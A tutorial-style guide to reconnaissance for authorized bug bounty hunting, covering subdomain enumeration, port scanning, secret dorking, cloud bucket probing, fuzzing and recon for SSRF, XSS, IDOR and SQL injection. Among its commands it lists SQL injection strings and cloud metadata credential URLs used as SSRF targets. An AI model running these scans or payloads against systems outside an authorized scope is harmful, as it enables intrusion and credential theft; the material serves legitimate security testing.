Advanced Bug Bounty Reconnaissance: A Comprehensive Technical Guide

Introduction

The cybersecurity community has repeatedly proven that proper reconnaissance is the difference between finding duplicate low-severity bugs and uncovering critical vulnerabilities worth thousands of dollars. Successful bug bounty hunters spend approximately 70% of their time on reconnaissance, not exploitation. This comprehensive guide explores the methodologies, tools, and strategies used by top researchers to discover vulnerabilities through systematic reconnaissance.

The Reconnaissance Mindset

Most security researchers fail not because they lack technical skills, but because they skip crucial reconnaissance phases. They rush into automated scanning, missing hidden assets like abandoned subdomains, forgotten acquisitions, misconfigured cloud storage, and exposed APIs. The bugs with the highest payouts often reside in assets that other hunters never discover.

Key Principles

Passive reconnaissance should precede active testing - Gather maximum intelligence before sending any exploits
Thoroughness beats speed initially - Comprehensive asset discovery leads to more unique findings
Automation should enhance, not replace, manual analysis - Automated tools are force multipliers, not substitutes
Context matters - Understanding what a company does helps identify likely vulnerability classes

Phase 1: Asset Discovery - Mapping the Attack Surface

1.1 Subdomain Enumeration

Most hunters only examine the primary domain, but the real goldmine lies in subdomains. Companies often have hundreds or thousands of subdomains, many forgotten or poorly maintained.

Essential Techniques:

Certificate Transparency Logs:

# Using crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u

# Using subfinder
subfinder -d target.com -o subdomains.txt

# Using amass
amass enum -passive -d target.com -o amass_results.txt

DNS Enumeration:

# Using dnsgen for permutation
cat subdomains.txt | dnsgen - | massdns -r resolvers.txt -o S -w resolved.txt

# Using altdns for alterations
altdns -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt

Shodan and Censys Integration:

These platforms index internet-connected devices and can reveal unexpected assets through certificate analysis, favicon hashes, and technology fingerprinting.

# Shodan query examples
ssl.cert.subject.cn:"target.com"
http.favicon.hash:HASH_VALUE

# Censys certificate search
# Navigate to censys.io and search for target domain
# Extract all certificate SANs (Subject Alternative Names)

Key Strategy: Certificate-based queries frequently uncover IP addresses hosting multiple applications. Always verify whether discovered IPs fall within the bug bounty program scope before testing.

1.2 Acquisitions and Company Infrastructure Research

Autonomous System Number (ASN) Discovery:

Understanding a company's network infrastructure provides direct access to scanning opportunities.

# Using ipinfo.io
curl ipinfo.io/AS<ASN_NUMBER>

# Using hostinfo.io
# Query for network ranges associated with the target

# Scan discovered ranges
nmap -sV -T3 -Pn -p 2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443,19000,19080 target_range

Corporate Research:

Review SEC filings and investor relations pages for recent acquisitions
Acquired companies often maintain separate infrastructure with different security postures
Search for company mentions in news articles about partnerships or mergers

1.3 Historical Data Mining

Wayback Machine:

Deleted pages often contain vulnerabilities or sensitive information that developers thought was removed.

# Using waybackurls
waybackurls target.com | tee wayback_urls.txt

# Using gau (Get All URLs)
gau target.com | tee all_urls.txt

# Filter for interesting endpoints
cat wayback_urls.txt | grep -E "\.(js|json|xml|conf|config|bak|backup|swp|old|db|sql)"

GitHub and Code Repository Scanning:

Developers frequently commit sensitive data to public repositories.

# GitHub dorking queries
org:target_org "api_key"
org:target_org "password"
org:target_org "secret"
org:target_org "token"
user:target_user "aws_access_key_id"

# Using tools
trufflehog --regex --entropy=True https://github.com/target/repo
gitleaks --repo-url=https://github.com/target/repo

Pastebin and Similar Services:

Search for:

Database dumps
Configuration files
API credentials
Internal documentation leaks

Phase 2: Technology Stack and Fingerprinting

2.1 Service Identification

# Port scanning with service detection
nmap -sV -sC -p- target.com -oA nmap_scan

# Fast port scanning with rustscan
rustscan -a target.com -- -A -sC

# HTTP technology fingerprinting
whatweb target.com
wappalyzer target.com

2.2 JavaScript Analysis

JavaScript files contain treasure troves of information including API endpoints, authentication logic, and hidden functionality.

# Extract JS files
gospider -s https://target.com -c 10 -d 2 --js > js_files.txt

# Analyze JS for endpoints and secrets
cat js_files.txt | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u

# Using LinkFinder
python3 linkfinder.py -i https://target.com/app.js -o results.html

# Extract API endpoints
cat js_files.txt | grep -Eo "api/v[0-9]/[a-zA-Z0-9/_-]*"

2.3 Cloud Storage Discovery

# AWS S3 buckets
aws s3 ls s3://target-company-name --no-sign-request
aws s3 ls s3://target-company-backups --no-sign-request

# Common bucket naming patterns
company-name-backups
company-name-logs
company-name-uploads
company-name-assets
company-name-prod
company-name-dev

Google Cloud Storage:

https://storage.googleapis.com/company-name-bucket/

Azure Blob Storage:

https://companyname.blob.core.windows.net/

Phase 3: Content Discovery and Endpoint Mapping

3.1 Directory and File Bruteforcing

# Using ffuf (Fast web fuzzer)
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301,302,403

# Using dirsearch
dirsearch -u https://target.com -e php,html,js,txt,zip -x 404,500

# Recursive discovery
feroxbuster -u https://target.com -w wordlist.txt -x js,php,txt,json -r

High-Value Targets:

/admin, /admin-panel, /administrator
/api, /api/v1, /api/v2
/backup, /backups, /.backup
/config, /.config, /configuration
/debug, /test, /dev
/graphql, /graphiql
/.git, /.svn, /.env
/swagger, /api-docs

3.2 Parameter Discovery

# Using Arjun
arjun -u https://target.com/endpoint

# Using ParamSpider
python3 paramspider.py --domain target.com

# Parameter mining from archived URLs
cat wayback_urls.txt | grep "?" | cut -d"?" -f2 | cut -d"=" -f1 | sort -u > parameters.txt

3.3 Virtual Host Discovery

# Using ffuf for vhost discovery
ffuf -w vhosts.txt -u https://target.com -H "Host: FUZZ.target.com" -mc 200

# Manual testing
curl -H "Host: internal.target.com" https://target.com

Phase 4: Vulnerability-Specific Reconnaissance

4.1 SSRF (Server-Side Request Forgery) Discovery

Look for functionality that:

Fetches external URLs (webhooks, URL validation, PDF generators)
Imports files from URLs
Performs server-side rendering
Integrates with external services

Common SSRF Endpoints:

/api/fetch?url=
/download?file=
/proxy?url=
/import?source=
/webhook?callback=
/pdf/generate?url=

Cloud Metadata Endpoints:

# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Google Cloud
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01

4.2 XSS (Cross-Site Scripting) Reconnaissance

Identify Input Reflection Points:

# Using dalfox
dalfox url https://target.com/search?q=test

# Manual testing for reflection
echo "test123unique" | while read url; do
    curl -s "$url" | grep -i "test123unique" && echo "Reflected: $url"
done

JavaScript Event Handlers: Look for user input in:

onclick, onerror, onload attributes
JavaScript template literals
DOM-based sinks: innerHTML, document.write, eval

4.3 Authentication and Authorization Issues

Common Weak Points:

Password reset functionality (token entropy, expiration)
OAuth implementation (redirect_uri manipulation, state parameter)
JWT tokens (algorithm confusion, weak secrets)
API key exposure (client-side JavaScript, mobile apps)

CSRF Token Analysis:

# Test for CSRF vulnerabilities
# 1. Remove token completely
# 2. Use empty token value
# 3. Change POST to GET
# 4. Use another user's token
# 5. Use same token for multiple accounts

4.4 IDOR (Insecure Direct Object Reference) Hunting

High-Value Endpoints:

/api/user/{id}
/profile/{username}
/document/{document_id}
/invoice/{invoice_id}
/order/{order_id}

Testing Methodology:

Create two test accounts
Identify sequential or guessable identifiers
Attempt cross-account access
Test with modified UUIDs (if predictable patterns exist)

4.5 SQL Injection Recon

Parameter Identification:

# Using sqlmap for initial detection
sqlmap -u "https://target.com/page?id=1" --batch --random-agent

# Manual testing
' OR '1'='1
" OR "1"="1
1' ORDER BY 1--
1' UNION SELECT NULL--

Error-Based Discovery: Intentionally trigger errors to leak database information:

' (single quote)

" (double quote)

\ (backslash)

; (semicolon)

Phase 5: Advanced Reconnaissance Techniques

5.1 Mobile Application Analysis

APK/IPA Extraction:

# Decompile Android APK
apktool d application.apk -o output_directory

# Extract strings for URLs and API keys
strings application.apk | grep -E "(http|https|api|key|token)"

# Using MobSF
# Upload APK to Mobile Security Framework for automated analysis

5.2 API Reconnaissance

API Documentation Discovery:

/swagger.json, /swagger-ui
/api/docs, /api-docs
/openapi.json
/graphql, /graphiql

GraphQL Introspection:

query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      fields {
        name
        type {
          name
          kind
        }
      }
    }
  }
}

5.3 Automated Vulnerability Scanning

While automation shouldn't be your primary method, it's effective for newly discovered assets.

# Using nuclei with custom templates

nuclei -l targets.txt -t nuclei-templates/ -severity critical,high

# Custom template groups
nuclei -l targets.txt -t nuclei-templates/cves/
nuclei -l targets.txt -t nuclei-templates/exposures/

# Using httpx for quick probing
cat subdomains.txt | httpx -silent -status-code -title -tech-detect -o probed.txt

Phase 6: Organization and Tracking

6.1 Documentation Strategy

Maintain detailed records of:

Discovered assets and their status (in-scope/out-of-scope)
Technologies identified on each asset
Interesting parameters and endpoints
Potential vulnerabilities noted
Attack surface changes over time

Recommended Tools:

Notion or Obsidian for note-taking
Excel/Google Sheets for asset tracking
Burp Suite project files for HTTP history
Screenshots for evidence preservation

6.2 Continuous Monitoring

# Automated subdomain monitoring script

#!/bin/bash
TARGET="target.com"
OLD_SUBS="old_subdomains.txt"
NEW_SUBS="new_subdomains.txt"

# Run subdomain enumeration
subfinder -d $TARGET -silent | sort -u > $NEW_SUBS

# Compare with previous results
diff $OLD_SUBS $NEW_SUBS | grep ">" | cut -d" " -f2 > new_findings.txt

# Notify if new subdomains found
if [ -s new_findings.txt ]; then
    echo "New subdomains discovered:"
    cat new_findings.txt
fi

# Update old file
cp $NEW_SUBS $OLD_SUBS

Common Pitfalls and How to Avoid Them

1. Tool Over-Reliance

Problem: Running automated scanners without understanding targets leads to duplicates. Solution: Use automation to supplement manual analysis, not replace it.

2. Insufficient Scope Understanding

Problem: Testing out-of-scope assets wastes time and can cause legal issues. Solution: Always verify scope before testing. Maintain an updated scope document.

3. Surface-Level Recon

Problem: Only checking obvious assets misses hidden vulnerabilities. Solution: Dedicate 70% of time to reconnaissance. Go several layers deep.

4. Poor Time Management

Problem: Spending too long on one aspect while neglecting others. Solution: Create a structured checklist and allocate time proportionally.

5. Inadequate Documentation

Problem: Forgetting what was already tested or losing track of findings. Solution: Document everything in real-time. Create reproducible testing notes.

Practical Workflow Example

Here's a condensed workflow for approaching a new target:

# Day 1: Initial Asset Discovery (4-6 hours)
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com -o amass_subs.txt
cat subs.txt amass_subs.txt | sort -u | httpx -silent > live_subs.txt

# Day 2: Deep Enumeration (4-6 hours)
cat live_subs.txt | nuclei -t nuclei-templates/exposures/ -severity medium,high,critical
gospider -S live_subs.txt -c 10 -d 3 --js -o spider_results
waybackurls target.com | tee wayback.txt

# Day 3: Technology and Endpoint Mapping (4-6 hours)
cat live_subs.txt | while read url; do
    whatweb $url
    ffuf -w wordlist.txt -u $url/FUZZ -mc 200,301,403 -o ffuf_$url.txt
done

# Day 4: Manual Testing Focus (6-8 hours)
# Focus on interesting findings from previous days
# Test authentication mechanisms
# Analyze JavaScript files
# Check for business logic flaws

# Ongoing: Continuous Monitoring
# Set up cron jobs for subdomain monitoring
# Subscribe to bug bounty program updates
# Track new features and changes

Advanced Tips from Top Researchers

Focus on Acquisitions: Recently acquired companies often have integration issues and forgotten infrastructure.
Monitor Certificate Transparency Logs: Set up alerts for new certificates issued for your target domains.
Analyze Competitors: If multiple programs exist in the same industry, reconnaissance on one can inform testing on another.
Study Past Disclosed Reports: Public bug bounty reports reveal what worked. Learn from others' techniques.
Build Custom Wordlists: Generic wordlists miss context-specific endpoints. Create industry and company-specific lists.
Test Edge Cases: Unconventional inputs often bypass security controls (Unicode, null bytes, long inputs).
Correlation is Key: A low-severity finding combined with another can become critical (CSRF + account takeover).

Conclusion

Effective reconnaissance is not about running the most tools or spending the longest time. It's about systematic, thoughtful information gathering that uncovers assets and vulnerabilities others miss. The researchers finding critical bugs worth thousands of dollars aren't necessarily more skilled at exploitation; they're better at reconnaissance.

Success in bug bounty hunting comes from:

Patience - Thorough recon takes time but pays off
Methodology - Systematic approaches prevent oversight
Persistence - Keep digging when others stop
Creativity - Think beyond automated tools
Documentation - Track everything for future reference

Remember that reconnaissance is an iterative process. As applications evolve, new assets appear, and security postures change. Continuous monitoring and re-reconnaissance of previously tested targets can yield new findings.

The difference between a mediocre bug bounty hunter and a top performer is often just reconnaissance depth. Master this phase, and the exploitation becomes significantly easier.

Resources for Further Learning

Tools:

Subfinder, Amass (subdomain enumeration)
httpx, nuclei (HTTP probing and scanning)
ffuf, feroxbuster (content discovery)
Burp Suite (web application testing)
git-secrets, trufflehog (credential scanning)

Platforms:

HackerOne, Bugcrowd (bug bounty platforms)
Shodan, Censys (internet-wide scanning)
crt.sh (certificate transparency logs)
GitHub, GitLab (code repository searching)

Communities:

Twitter #bugbountytips
Reddit r/bugbounty
Discord bug bounty servers
Conference talks (DEF CON, Black Hat, BSides)

Start with one target, follow this methodology systematically, and document your process. Over time, you'll develop intuition for where vulnerabilities hide and build your own enhanced reconnaissance workflow.

Search Suggest